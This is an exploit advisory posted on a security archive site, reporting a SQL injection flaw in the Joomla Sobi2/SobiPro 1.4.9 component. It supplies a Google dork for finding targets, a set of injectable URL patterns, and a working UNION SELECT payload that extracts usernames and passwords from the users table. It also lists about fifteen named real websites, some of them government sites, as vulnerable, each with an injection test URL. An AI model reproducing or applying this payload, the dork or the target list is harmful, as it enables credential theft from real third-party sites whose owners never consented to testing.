Joomla Sobi2 SobiPro Components 1.4.9 SQL Injection

2019.02.01
gb KingSkrupellos (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:''/index.php?option=com_sobi2''

#################################################################### # Exploit Title : Joomla Sobi2 SobiPro Components 1.4.9 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 01/02/2019 # Vendor Homepage : sigsiu.net # Software Download Link : sigsiu.net/center/sobipro-component # Software Information Links : joomla4ever.org/extensions/ext-sobi2 extensions.joomla.org/extension/sobipro/ # Software Version : 1.4.9 and J3.x # Affected All Versions : Joomla 1.5 - 1.0.8; Joomla 2.5, Joomla 3.x - 1.1.10 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_sobi2'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** SobiPro - creating and building a business directory for CMS Joomla. SobiPro is an advanced powerful multi-content directory component for Joomla! that has been originally designed as a directory extension with CCK features. With SobiPro you can easily create multiple directories or any type of content. #################################################################### # Impact : *********** Joomla Sobi2 SobiPro 1.4.9 and other versions component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_sobi2&Itemid=[SQL Injection] /index.php?option=com_sobi2&catid=[ID-NUMBER]&Itemid=[SQL Injection] /index.php?option=com_sobi2&letter=[LETTER-HERE]&Itemid=[SQL Injection] /index.php?option=com_sobi2&sobi2Task=popularListing&Itemid=[SQL Injection] /index.php?option=com_sobi2&sobi2Task=sobi2Details&catid=[SQL Injection] /index.php?option=com_sobi2&catid=[ID-NUMBER]&limitstart=[SQL Injection] /index.php?option=com_sobi2&sobi2Task=sobi2Details&catid= [ID-NUMBER]&sobi2Id=[SQL Injection] /index.php?option=com_sobi2&sobi2Task=sobi2Details&catid= [ID-NUMBER]&sobi2Id=[ID-NUMBER]&Itemid=[SQL Injection] /index.php?option=com_sobi2&Itemid=27&catid=[SQL Injection] # Example Exploit Payload : ************************* -99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/* #################################################################### # Example Vulnerable Sites : ************************* [+] ville-bon-encontre.fr/index.php?option=com_sobi2&sobi2Task= sobi2Details&catid=6&sobi2Id=100&Itemid=44%27 [+] clubecampismolisboa.pt/j10ccl/index.php?option=com_sobi2&Itemid=235%27 [+] villagepaquetville.com/index.php?option=com_sobi2&letter=J&Itemid=83%27 [+] kirchen-wiesbaden.de/kiwicms/index.php?option=com_sobi2&sobi2Task= sobi2Details&catid=2&sobi2Id=60&Itemid=1%27 [+] ortopediapanzironi.it/index.php?option=com_sobi2&sobi2Task= sobi2Details&sobi2Id=106&Itemid=1%27 [+] guiaoriental.com/index.php?option=com_sobi2&catid=40&Itemid=60&limitstart=24%27 [+] crib44.fr/index.php?option=com_sobi2&sobi2Task=popularListing&Itemid=4%27 [+] mkmoda.org/index.php?option=com_sobi2&letter=Z&Itemid=65%27 [+] mapinfotools.com/index.php?option=com_sobi2& sobi2Task=sobi2Details&catid=0&sobi2Id=308&Itemid=72%27 [+] dansksecurity.dk/index.php?option=com_sobi2&catid=35&Itemid=52%27 [+] desarrollo.treintaytres.gub.uy/index.php?option=com_sobi2&catid=102&Itemid=59%27 [+] ypkt.gov.my/direktoripjd/index.php?option=com_sobi2&catid=14&Itemid=3%27 [+] welcometoiceland.is/index.php?option=com_sobi2&catid=24&Itemid=35%27 [+] financer.co.il/index.php?option=com_sobi2&Itemid=90%27 [+] s291067893.onlinehome.fr/masortieloisir/siteprod/index.php?option= com_sobi2&sobi2Task=sobi2Details&catid=26&sobi2Id=17&Itemid=1%27 #################################################################### # Example SQL Database Error : **************************** Notice: Only variable references should be returned by reference in /var/www/clients/client11/web20/web/libraries/joomla/session/session.php on line 343 Deprecated: Non-static method JApplicationHelper::getPath() should not be called statically, assuming $this from incompatible context in /home/otpda/public_html/libraries/joomla/application/component/helper.php on line 168 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top